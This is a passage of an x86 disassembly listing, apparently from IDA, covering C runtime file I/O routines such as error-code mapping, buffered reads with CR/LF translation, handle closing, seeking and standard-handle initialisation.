test eax, eax
jnz short loc_42EF45
cmp [ebp+var_15], al
jnz short loc_42EF45
or eax, 0FFFFFFFFh
jmp short loc_42EF45
; ---------------------------------------------------------------------------
loc_42EF42: ; CODE XREF: sub_42E525+A0A�j
mov eax, [ebp+var_34]
loc_42EF45: ; CODE XREF: sub_42E525+A11�j
; sub_42E525+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42E525 endp
; =============== S U B R O U T I N E =======================================
sub_42EF4A proc near ; CODE XREF: sub_42E525+7A3�p
; sub_42E525+8DC�p
arg_0 = dword ptr 4
cmp dword_4535A4, 1
push esi
jle short loc_42EF64
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42EF73
; ---------------------------------------------------------------------------
loc_42EF64: ; CODE XREF: sub_42EF4A+8�j
mov esi, [esp+4+arg_0]
mov eax, off_453398
mov al, [eax+esi*2]
and eax, 4
loc_42EF73: ; CODE XREF: sub_42EF4A+18�j
test eax, eax
jnz short loc_42EF7D
and esi, 0FFFFFFDFh
sub esi, 7
loc_42EF7D: ; CODE XREF: sub_42EF4A+2B�j
mov eax, esi
pop esi
retn
sub_42EF4A endp
; =============== S U B R O U T I N E =======================================
sub_42EF81 proc near ; CODE XREF: sub_42E525+1E1�p
; sub_42E525+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_42EF93
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_42EF93: ; CODE XREF: sub_42EF81+7�j
push edx
call sub_42F312
pop ecx
retn
sub_42EF81 endp
; =============== S U B R O U T I N E =======================================
sub_42EF9B proc near ; CODE XREF: sub_42E525+6B�p
; sub_42E525+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_42EFB1
push [esp+arg_4]
push [esp+4+arg_0]
call sub_43339F
pop ecx
pop ecx
locret_42EFB1: ; CODE XREF: sub_42EF9B+5�j
retn
sub_42EF9B endp
; =============== S U B R O U T I N E =======================================
sub_42EFB2 proc near ; CODE XREF: sub_42E525+63�p
; sub_42E525+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_42EFB8: ; CODE XREF: sub_42EFB2+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_42EF81
mov edi, eax
push edi
call sub_42C47C
pop ecx
test eax, eax
pop ecx
jnz short loc_42EFB8
mov eax, edi
pop edi
pop esi
retn
sub_42EFB2 endp
; =============== S U B R O U T I N E =======================================
sub_42EFD6 proc near ; CODE XREF: sub_42A5F0+16�p
; sub_42AAB1+67�p ...
arg_0 = dword ptr 4
push esi
call sub_42F052
mov ecx, [esp+4+arg_0]
xor esi, esi
mov [eax], ecx
mov eax, offset dword_453230
loc_42EFE9: ; CODE XREF: sub_42EFD6+20�j
cmp ecx, [eax]
jz short loc_42F00F
add eax, 8
inc esi
cmp eax, offset off_453398
jl short loc_42EFE9
cmp ecx, 13h
jb short loc_42F01F
cmp ecx, 24h
ja short loc_42F01F
call sub_42F049
mov dword ptr [eax], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F00F: ; CODE XREF: sub_42EFD6+15�j
call sub_42F049
mov ecx, dword_453234[esi*8]
pop esi
mov [eax], ecx
retn
; ---------------------------------------------------------------------------
loc_42F01F: ; CODE XREF: sub_42EFD6+25�j
; sub_42EFD6+2A�j
cmp ecx, 0BCh
jb short loc_42F03C
cmp ecx, 0CAh
ja short loc_42F03C
call sub_42F049
mov dword ptr [eax], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F03C: ; CODE XREF: sub_42EFD6+4F�j
; sub_42EFD6+57�j
call sub_42F049
mov dword ptr [eax], 16h
pop esi
retn
sub_42EFD6 endp
; =============== S U B R O U T I N E =======================================
sub_42F049 proc near ; CODE XREF: sub_429D89:loc_429F3B�p
; sub_42A1F1+83�p ...
call sub_42E41E
add eax, 8
retn
sub_42F049 endp
; =============== S U B R O U T I N E =======================================
sub_42F052 proc near ; CODE XREF: sub_42A5F0+36�p
; sub_42EFD6+1�p ...
call sub_42E41E
add eax, 0Ch
retn
sub_42F052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F05B proc near ; CODE XREF: sub_429D89+27�p
; sub_429D89+E4�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_42F079
mov ecx, off_453398
movzx eax, word ptr [ecx+eax*2]
jmp short loc_42F0CB
; ---------------------------------------------------------------------------
loc_42F079: ; CODE XREF: sub_42F05B+10�j
mov ecx, eax
push esi
mov esi, off_453398
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_42F09E
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_42F0A7
; ---------------------------------------------------------------------------
loc_42F09E: ; CODE XREF: sub_42F05B+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_42F0A7: ; CODE XREF: sub_42F05B+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_43340D
add esp, 1Ch
test eax, eax
jnz short loc_42F0C7
leave
retn
; ---------------------------------------------------------------------------
loc_42F0C7: ; CODE XREF: sub_42F05B+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_42F0CB: ; CODE XREF: sub_42F05B+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_42F05B endp
; =============== S U B R O U T I N E =======================================
sub_42F0D0 proc near ; CODE XREF: sub_418974+88�p
; sub_418A0D+216�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FC0
jnb short loc_42F115
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42F115
push edi
push esi
call sub_43234B
push esi
call sub_42F12D
push esi
mov edi, eax
call sub_4323AA
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F115: ; CODE XREF: sub_42F0D0+B�j
; sub_42F0D0+26�j
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F0D0 endp
; =============== S U B R O U T I N E =======================================
sub_42F12D proc near ; CODE XREF: sub_42F0D0+30�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_432309
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42F17B
cmp esi, 1
jz short loc_42F149
cmp esi, 2
jnz short loc_42F15F
loc_42F149: ; CODE XREF: sub_42F12D+15�j
push 2
call sub_432309
push 1
mov edi, eax
call sub_432309
pop ecx
cmp eax, edi
pop ecx
jz short loc_42F17B
loc_42F15F: ; CODE XREF: sub_42F12D+1A�j
push esi
call sub_432309
pop ecx
push eax
call dword_437044 ; CloseHandle
test eax, eax
jnz short loc_42F17B
call dword_43716C ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_42F17D
; ---------------------------------------------------------------------------
loc_42F17B: ; CODE XREF: sub_42F12D+10�j
; sub_42F12D+30�j ...
xor edi, edi
loc_42F17D: ; CODE XREF: sub_42F12D+4C�j
push esi
call sub_43228A
mov eax, esi
and esi, 1Fh
sar eax, 5
pop ecx
mov eax, dword_676EC0[eax*4]
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_42F1AB
push edi
call sub_42EFD6
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_42F1AD
; ---------------------------------------------------------------------------
loc_42F1AB: ; CODE XREF: sub_42F12D+70�j
xor eax, eax
loc_42F1AD: ; CODE XREF: sub_42F12D+7C�j
pop edi
pop esi
retn
sub_42F12D endp
; =============== S U B R O U T I N E =======================================
sub_42F1B0 proc near ; CODE XREF: sub_42A06C+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_42F1D9
test al, 8
jz short loc_42F1D9
push dword ptr [esi+8]
call sub_429822
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_42F1D9: ; CODE XREF: sub_42F1B0+A�j
; sub_42F1B0+E�j
pop esi
retn
sub_42F1B0 endp
; =============== S U B R O U T I N E =======================================
sub_42F1DB proc near ; CODE XREF: sub_42F26E+4C�p
; sub_42F26E+67�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_42F209
test eax, eax
pop ecx
jz short loc_42F1F0
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F1F0: ; CODE XREF: sub_42F1DB+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_42F205
push dword ptr [esi+10h]
call sub_433556
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_42F205: ; CODE XREF: sub_42F1DB+19�j
xor eax, eax
pop esi
retn
sub_42F1DB endp
; =============== S U B R O U T I N E =======================================
sub_42F209 proc near ; CODE XREF: sub_42A06C+10�p
; sub_42A37E+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_42F256
test ax, 108h
jz short loc_42F256
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_42F256
push edi
push eax
push dword ptr [esi+10h]
call sub_4323CC
add esp, 0Ch
cmp eax, edi
jnz short loc_42F24F
mov eax, [esi+0Ch]
test al, 80h
jz short loc_42F256
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_42F256
; ---------------------------------------------------------------------------
loc_42F24F: ; CODE XREF: sub_42F209+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_42F256: ; CODE XREF: sub_42F209+14�j
; sub_42F209+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_42F209 endp
; =============== S U B R O U T I N E =======================================
sub_42F265 proc near ; CODE XREF: sub_42C0F0�p
push 1
call sub_42F26E
pop ecx
retn
sub_42F265 endp
; =============== S U B R O U T I N E =======================================
sub_42F26E proc near ; CODE XREF: sub_42F265+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 2
xor ebx, ebx
xor edi, edi
call sub_42DA1F
xor esi, esi
pop ecx
cmp dword_678000, esi
jle short loc_42F2FB
loc_42F287: ; CODE XREF: sub_42F26E+8B�j
mov eax, dword_676FEC
mov eax, [eax+esi*4]
test eax, eax
jz short loc_42F2F2
test byte ptr [eax+0Ch], 83h
jz short loc_42F2F2
push eax
push esi
call sub_42C133
mov eax, dword_676FEC
pop ecx
pop ecx
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_42F2E2
cmp [esp+0Ch+arg_0], 1
jnz short loc_42F2C8
push eax
call sub_42F1DB
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42F2E2
inc ebx
jmp short loc_42F2E2
; ---------------------------------------------------------------------------
loc_42F2C8: ; CODE XREF: sub_42F26E+49�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_42F2E2
test cl, 2
jz short loc_42F2E2
push eax
call sub_42F1DB
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_42F2E2
or edi, eax
loc_42F2E2: ; CODE XREF: sub_42F26E+42�j
; sub_42F26E+55�j ...
mov eax, dword_676FEC
push dword ptr [eax+esi*4]
push esi
call sub_42C185
pop ecx
pop ecx
loc_42F2F2: ; CODE XREF: sub_42F26E+23�j
; sub_42F26E+29�j
inc esi
cmp esi, dword_678000
jl short loc_42F287
loc_42F2FB: ; CODE XREF: sub_42F26E+17�j
push 2
call sub_42DA80
cmp [esp+10h+arg_0], 1
pop ecx
mov eax, ebx
jz short loc_42F30E
mov eax, edi
loc_42F30E: ; CODE XREF: sub_42F26E+9C�j
pop edi
pop esi
pop ebx
retn
sub_42F26E endp
; =============== S U B R O U T I N E =======================================
sub_42F312 proc near ; CODE XREF: sub_42A0E7+A9�p
; sub_42AFB7+34�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_42F3E9
test al, 40h
jnz loc_42F3E9
test al, 2
jz short loc_42F338
or al, 20h
mov [esi+0Ch], eax
jmp loc_42F3E9
; ---------------------------------------------------------------------------
loc_42F338: ; CODE XREF: sub_42F312+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_42F34C
push esi
call sub_433123
pop ecx
jmp short loc_42F351
; ---------------------------------------------------------------------------
loc_42F34C: ; CODE XREF: sub_42F312+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_42F351: ; CODE XREF: sub_42F312+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_42F3EE
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_42F3D8
cmp eax, 0FFFFFFFFh
jz short loc_42F3D8
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_42F3AD
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_42F396
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_676EC0[edi*4]
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_42F39B
; ---------------------------------------------------------------------------
loc_42F396: ; CODE XREF: sub_42F312+6B�j
mov edi, offset dword_4535B0
loc_42F39B: ; CODE XREF: sub_42F312+82�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_42F3AD
or dh, 20h
mov [esi+0Ch], edx
loc_42F3AD: ; CODE XREF: sub_42F312+62�j
; sub_42F312+93�j
cmp dword ptr [esi+18h], 200h
jnz short loc_42F3CA
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_42F3CA
test ch, 4
jnz short loc_42F3CA
mov dword ptr [esi+18h], 1000h
loc_42F3CA: ; CODE XREF: sub_42F312+A2�j
; sub_42F312+AA�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F3D8: ; CODE XREF: sub_42F312+55�j
; sub_42F312+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_42F3E9: ; CODE XREF: sub_42F312+A�j
; sub_42F312+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F312 endp
; =============== S U B R O U T I N E =======================================
sub_42F3EE proc near ; CODE XREF: sub_41EBD7+EC�p
; sub_42A0E7+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FC0
jnb short loc_42F43B
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42F43B
push edi
push esi
call sub_43234B
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_42F453
push esi
mov edi, eax
call sub_4323AA
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F43B: ; CODE XREF: sub_42F3EE+B�j
; sub_42F3EE+26�j
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F3EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F453 proc near ; CODE XREF: sub_42F3EE+38�p
; sub_4335E9+274�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_42F625
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
mov eax, dword_676EC0[ecx*4]
lea edi, ds:676EC0h[ecx*4]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_42F625
test cl, 48h
jz short loc_42F4BE
mov al, [eax+5]
cmp al, 0Ah
jz short loc_42F4BE
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_42F4BE: ; CODE XREF: sub_42F453+4C�j
; sub_42F453+53�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [edi]
push [ebp+arg_8]
push edx
push dword ptr [eax+esi]
call dword_437084 ; ReadFile
test eax, eax
jnz short loc_42F510
call dword_43716C ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_42F4F8
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
mov [eax], esi
jmp short loc_42F508
; ---------------------------------------------------------------------------
loc_42F4F8: ; CODE XREF: sub_42F453+8F�j
cmp eax, 6Dh
jz loc_42F625
push eax
call sub_42EFD6
pop ecx
loc_42F508: ; CODE XREF: sub_42F453+A3�j
or eax, 0FFFFFFFFh
jmp loc_42F627
; ---------------------------------------------------------------------------
loc_42F510: ; CODE XREF: sub_42F453+82�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_42F620
test edx, edx
jz short loc_42F535
cmp byte ptr [ebx], 0Ah
jnz short loc_42F535
or al, 4
jmp short loc_42F537
; ---------------------------------------------------------------------------
loc_42F535: ; CODE XREF: sub_42F453+D7�j
; sub_42F453+DC�j
and al, 0FBh
loc_42F537: ; CODE XREF: sub_42F453+E0�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_42F61A
loc_42F54F: ; CODE XREF: sub_42F453+1AF�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_42F60A
cmp al, 0Dh
jz short loc_42F56B
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_42F5FC
; ---------------------------------------------------------------------------
loc_42F56B: ; CODE XREF: sub_42F453+10B�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_42F589
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_42F580
add [ebp+arg_8], 2
jmp short loc_42F5DE
; ---------------------------------------------------------------------------
loc_42F580: ; CODE XREF: sub_42F453+125�j
mov byte ptr [ebx], 0Dh
inc ebx
mov [ebp+arg_8], eax
jmp short loc_42F5FC
; ---------------------------------------------------------------------------
loc_42F589: ; CODE XREF: sub_42F453+11C�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call dword_437084 ; ReadFile
test eax, eax
jnz short loc_42F5B1
call dword_43716C ; RtlGetLastWin32Error
test eax, eax
jnz short loc_42F5F8
loc_42F5B1: ; CODE XREF: sub_42F453+152�j
cmp [ebp+var_C], 0
jz short loc_42F5F8
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_42F5D3
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_42F5DE
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
inc ebx
mov [ecx+esi+5], al
jmp short loc_42F5FC
; ---------------------------------------------------------------------------
loc_42F5D3: ; CODE XREF: sub_42F453+16B�j
cmp ebx, [ebp+arg_4]
jnz short loc_42F5E3
cmp [ebp+var_1], 0Ah
jnz short loc_42F5E3
loc_42F5DE: ; CODE XREF: sub_42F453+12B�j
; sub_42F453+172�j
mov byte ptr [ebx], 0Ah
jmp short loc_42F5FB
; ---------------------------------------------------------------------------
loc_42F5E3: ; CODE XREF: sub_42F453+183�j
; sub_42F453+189�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_42F84D
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_42F5FC
loc_42F5F8: ; CODE XREF: sub_42F453+15C�j
; sub_42F453+162�j
mov byte ptr [ebx], 0Dh
loc_42F5FB: ; CODE XREF: sub_42F453+18E�j
inc ebx
loc_42F5FC: ; CODE XREF: sub_42F453+113�j
; sub_42F453+134�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_42F54F
jmp short loc_42F61A
; ---------------------------------------------------------------------------
loc_42F60A: ; CODE XREF: sub_42F453+103�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_42F61A
or al, 2
mov [esi], al
loc_42F61A: ; CODE XREF: sub_42F453+F6�j
; sub_42F453+1B5�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_42F620: ; CODE XREF: sub_42F453+CF�j
mov eax, [ebp+var_8]
jmp short loc_42F627
; ---------------------------------------------------------------------------
loc_42F625: ; CODE XREF: sub_42F453+16�j
; sub_42F453+43�j ...
xor eax, eax
loc_42F627: ; CODE XREF: sub_42F453+B8�j
; sub_42F453+1D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_42F453 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F62C proc near ; CODE XREF: .text:0042C525�p
var_48 = byte ptr -48h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 480h
call sub_4296E8
mov esi, eax
pop ecx
test esi, esi
jnz short loc_42F64E
push 1Bh
call sub_42C5AC
pop ecx
loc_42F64E: ; CODE XREF: sub_42F62C+18�j
mov dword_676EC0, esi
mov dword_676FC0, 20h
lea eax, [esi+480h]
loc_42F664: ; CODE XREF: sub_42F62C+58�j
cmp esi, eax
jnb short loc_42F686
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
and dword ptr [esi+8], 0
mov byte ptr [esi+5], 0Ah
mov eax, dword_676EC0
add esi, 24h
add eax, 480h
jmp short loc_42F664
; ---------------------------------------------------------------------------
loc_42F686: ; CODE XREF: sub_42F62C+3A�j
lea eax, [ebp+var_48]
push eax
call dword_437234 ; GetStartupInfoA
cmp [ebp+var_16], 0
jz loc_42F76C
mov eax, [ebp+var_14]
test eax, eax
jz loc_42F76C
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_4], eax
mov eax, 800h
cmp edi, eax
jl short loc_42F6BC
mov edi, eax
loc_42F6BC: ; CODE XREF: sub_42F62C+8C�j
cmp dword_676FC0, edi
jge short loc_42F71A
mov esi, offset dword_676EC4
loc_42F6C9: ; CODE XREF: sub_42F62C+E4�j
push 480h
call sub_4296E8
test eax, eax
pop ecx
jz short loc_42F714
add dword_676FC0, 20h
mov [esi], eax
lea ecx, [eax+480h]
loc_42F6E7: ; CODE XREF: sub_42F62C+D9�j
cmp eax, ecx
jnb short loc_42F707
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, 480h
jmp short loc_42F6E7
; ---------------------------------------------------------------------------
loc_42F707: ; CODE XREF: sub_42F62C+BD�j
add esi, 4
cmp dword_676FC0, edi
jl short loc_42F6C9
jmp short loc_42F71A
; ---------------------------------------------------------------------------
loc_42F714: ; CODE XREF: sub_42F62C+AA�j
mov edi, dword_676FC0
loc_42F71A: ; CODE XREF: sub_42F62C+96�j
; sub_42F62C+E6�j
xor esi, esi
test edi, edi
jle short loc_42F76C
loc_42F720: ; CODE XREF: sub_42F62C+13E�j
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_42F762
mov al, [ebx]
test al, 1
jz short loc_42F762
test al, 8
jnz short loc_42F73F
push ecx
call dword_4371F0 ; GetFileType
test eax, eax
jz short loc_42F762
loc_42F73F: ; CODE XREF: sub_42F62C+106�j
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax], ecx
mov cl, [ebx]
mov [eax+4], cl
loc_42F762: ; CODE XREF: sub_42F62C+FC�j
; sub_42F62C+102�j ...
add [ebp+var_4], 4
inc esi
inc ebx
cmp esi, edi
jl short loc_42F720
loc_42F76C: ; CODE XREF: sub_42F62C+69�j
; sub_42F62C+74�j ...
xor ebx, ebx
loc_42F76E: ; CODE XREF: sub_42F62C+1A9�j
mov ecx, dword_676EC0
lea eax, [ebx+ebx*8]
cmp dword ptr [ecx+eax*4], 0FFFFFFFFh
lea esi, [ecx+eax*4]
jnz short loc_42F7CD
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_42F78D
push 0FFFFFFF6h
pop eax
jmp short loc_42F797
; ---------------------------------------------------------------------------
loc_42F78D: ; CODE XREF: sub_42F62C+15A�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_42F797: ; CODE XREF: sub_42F62C+15F�j
push eax
call dword_4371FC ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_42F7BC
push edi
call dword_4371F0 ; GetFileType
test eax, eax
jz short loc_42F7BC
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_42F7C2
loc_42F7BC: ; CODE XREF: sub_42F62C+177�j
; sub_42F62C+182�j
or byte ptr [esi+4], 40h
jmp short loc_42F7D1
; ---------------------------------------------------------------------------
loc_42F7C2: ; CODE XREF: sub_42F62C+18E�j
cmp eax, 3
jnz short loc_42F7D1
or byte ptr [esi+4], 8
jmp short loc_42F7D1
; ---------------------------------------------------------------------------
loc_42F7CD: ; CODE XREF: sub_42F62C+152�j
or byte ptr [esi+4], 80h
loc_42F7D1: ; CODE XREF: sub_42F62C+194�j
; sub_42F62C+199�j ...
inc ebx
cmp ebx, 3
jl short loc_42F76E
push dword_676FC0
call dword_437200 ; SetHandleCount
pop edi
pop esi
pop ebx
leave
retn
sub_42F62C endp
; =============== S U B R O U T I N E =======================================
sub_42F7E8 proc near ; CODE XREF: sub_42A1F1+20�p
; sub_42A1F1+EB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FC0
jnb short loc_42F835
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42F835
push edi
push esi
call sub_43234B
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_42F84D
push esi
mov edi, eax
call sub_4323AA
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F835: ; CODE XREF: sub_42F7E8+B�j
; sub_42F7E8+26�j
call sub_42F049
mov dword ptr [eax], 9
call sub_42F052
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F7E8 endp
; =============== S U B R O U T I N E =======================================
sub_42F84D proc near ; CODE XREF: sub_42F453+197�p
; sub_42F7E8+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_432309
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_42F86C
call sub_42F049
mov dword ptr [eax], 9
jmp short loc_42F899
; ---------------------------------------------------------------------------
loc_42F86C: ; CODE XREF: sub_42F84D+10�j
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call dword_4370AC ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42F88C
call dword_43716C ; RtlGetLastWin32Error
jmp short loc_42F88E
; ---------------------------------------------------------------------------
loc_42F88C: ; CODE XREF: sub_42F84D+35�j
xor eax, eax
loc_42F88E: ; CODE XREF: sub_42F84D+3D�j
test eax, eax
jz short loc_42F89E
push eax
call sub_42EFD6
pop ecx
loc_42F899: ; CODE XREF: sub_42F84D+1D�j
or eax, 0FFFFFFFFh
jmp short loc_42F8BD
; ---------------------------------------------------------------------------
loc_42F89E: ; CODE XREF: sub_42F84D+43�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov eax, esi
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
and byte ptr [ecx+eax*4+4], 0FDh
lea eax, [ecx+eax*4+4]
mov eax, edi
